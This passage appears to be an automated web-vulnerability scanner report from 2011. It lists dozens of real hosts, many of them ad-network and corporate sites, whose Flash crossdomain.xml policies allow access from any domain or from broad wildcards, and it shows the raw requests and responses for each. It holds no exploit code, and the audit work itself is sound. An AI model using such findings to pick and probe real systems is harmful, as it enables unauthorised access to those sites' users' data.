GET /crossdomain.xml HTTP/1.0
Host: hosted.newsgator.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=600
Content-Length: 802
Content-Type: text/xml
Last-Modified: Wed, 10 Sep 2008 16:54:56 GMT
Accept-Ranges: bytes
ETag: "c11fe6f36513c91:263"
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 18:04:27 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
   <allow-access-from domain="*.usatoday.com" secure="true"/>
   <allow-access-from domain="*.usatoday.net" secure="true"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="feeds.feedburner.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.zap2it.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.proofmyproject.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.turner.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.corp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.sliceoflime.com" secure="true"/>
...[SNIP]...

7.15. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 15-May-2011 14:21:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Fri, 12-Aug-2011 14:21:36 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.16. http://idcs.interclick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Accept-Ranges: bytes
ETag: "7b643f1dafecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 14 May 2011 14:23:40 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.17. http://images.zwire.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://images.zwire.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: images.zwire.com

Response

HTTP/1.0 200 OK
ETag: "f612d87b65e3c71:42aa"
Accept-Ranges: bytes
Content-Length: 128
Last-Modified: Mon, 20 Aug 2007 20:05:41 GMT
X-Server: 15
X-Cache-Info: caching
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/xml
Cache-Control: max-age=1800
Date: Sat, 14 May 2011 22:29:19 GMT
Connection: close

<?xml version="1.0"?>
<!-- Are You Hungry -->
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.18. http://img-cdn.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img-cdn.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img-cdn.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Content-Type: text/x-cross-domain-policy
Date: Sun, 15 May 2011 11:29:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.19. http://img.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:04:18 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1b1f-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.20. http://m8.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://m8.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m8.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:34:56 GMT
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 248
X-Varnish: 1869850705
Date: Sat, 14 May 2011 13:58:48 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.21. http://media2.legacy.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media2.legacy.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

7.22. http://metrics.blackberry.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.blackberry.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.blackberry.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:23:37 GMT
Server: Omniture DC/2.0.0
xserver: www300
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

7.23. http://nmp.newsgator.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: nmp.newsgator.com

Response

HTTP/1.0 200 OK
Content-Length: 802
Content-Type: text/xml
Last-Modified: Wed, 10 Sep 2008 16:54:56 GMT
Accept-Ranges: bytes
ETag: "c11fe6f36513c91:21fa"
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
Cache-Control: max-age=600
Date: Sat, 14 May 2011 18:04:23 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
   <allow-access-from domain="*.usatoday.com" secure="true"/>
   <allow-access-from domain="*.usatoday.net" secure="true"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="feeds.feedburner.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.zap2it.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.proofmyproject.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.turner.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.corp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.sliceoflime.com" secure="true"/>
...[SNIP]...

7.24. http://omni.accenture.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://omni.accenture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: omni.accenture.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 13:59:41 GMT
Server: Omniture DC/2.0.0
xserver: www290
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

7.25. http://pixel.33across.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"211-1300735657000"
Last-Modified: Mon, 21 Mar 2011 19:27:37 GMT
Content-Type: application/xml
Content-Length: 211
Date: Sat, 14 May 2011 18:35:10 GMT
Connection: close
Server: 33XG1

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...

7.26. http://platform.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://platform.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: platform.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Sat, 14 May 2011 14:24:02 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.27. http://r1.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r1.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r1.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:06:34 GMT
ETag: "2438668-f7-44d91ae237a80"
Accept-Ranges: bytes
Content-Length: 247
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Date: Sat, 14 May 2011 13:59:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.28. http://search.twitter.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:06:17 GMT
Server: hi
Last-Modified: Tue, 25 Jan 2011 18:04:08 GMT
Cache-Control: max-age=1800
Expires: Sat, 14 May 2011 18:36:17 GMT
Content-Type: application/xml
Content-Length: 206
Vary: Accept-Encoding
X-Varnish: 905016961
Age: 0
Via: 1.1 varnish
X-Cache-Svr: smf1-aaq-23-sr4.prod.twitter.com
X-Cache: MISS
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.29. http://secure-us.imrworldwide.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 22:34:15 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Sat, 21 May 2011 22:34:15 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

7.30. http://segment-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 14 May 2011 14:35:06 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

7.31. https://tt3.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://tt3.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tt3.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=86400
Date: Sat, 14 May 2011 14:13:38 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.32. http://us.blackberry.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: us.blackberry.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
ETag: W/"213-1271207419000"
Last-Modified: Wed, 14 Apr 2010 01:10:19 GMT
Content-Type: text/xml;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 14 May 2011 14:23:30 GMT
Date: Sat, 14 May 2011 14:23:30 GMT
Content-Length: 213
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-d
...[SNIP]...

7.33. http://www.blackberry.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackberry.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blackberry.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:23:24 GMT
Server: Apache
Last-Modified: Tue, 07 Dec 2010 21:59:07 GMT
ETag: "14eadd1-c7-496d91d17a0c0"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.34. http://www.vizury.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vizury.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vizury.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 13:58:38 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Fri, 18 Feb 2011 23:30:51 GMT
ETag: "e3db-144-49c96e79260c0"
Accept-Ranges: bytes
Content-Length: 324
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.35. http://yads.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://yads.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: yads.zedo.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:14:00 GMT
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:05:58 GMT
ETag: "289991e-f7-44d91abfe2980"
Accept-Ranges: bytes
Content-Length: 247
Edge-Control: dca=esi, !no-store
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.36. http://yatra.122.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://yatra.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: yatra.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:35:51 GMT
Server: Omniture DC/2.0.0
xserver: www24
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

7.37. http://ads.adsonar.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.adsonar.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 22:29:21 GMT
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"
Accept-Ranges: bytes
Content-Length: 2621
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300, max=973
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

7.38. http://ads.bridgetrack.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.bridgetrack.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 810
Content-Type: text/html
Date: Sat, 14 May 2011 13:58:40 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="ads.bridgetrack.com.edgesuite.net" />
   <allow-access-from domain="ads.bri
...[SNIP]...
<allow-access-from domain="sec-ads.bridgetrack.com" />
   <allow-access-from domain="cms-ads.bridgetrack.com" />
   <allow-access-from domain="sec-cms-ads.bridgetrack.com" />
   <allow-access-from domain="travelerssaves.com" />
   <allow-access-from domain="moneyneedsattention.com" />
   <allow-access-from domain="www.moneyneedsattention.com"/>
   <allow-access-from domain="portal.kaplan.edu" />
   <allow-access-from domain="www.portal.kaplan.edu"/>
<allow-access-from domain="*.spongecell.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.myvolvo.com.au" secure="false" />
...[SNIP]...

7.39. http://api.tweetmeme.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 14 May 2011 22:29:10 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
Expires: Sat, 14 May 2011 22:31:39 +0000 GMT
Etag: 25cf8308a31d3f8c3d709a6ab6e0ae9d
X-Served-By: ded2060

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/>
...[SNIP]...

7.40. http://buyonline.aegonreligare.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://buyonline.aegonreligare.com
Path:   /crossdomain.xml

Issue detail

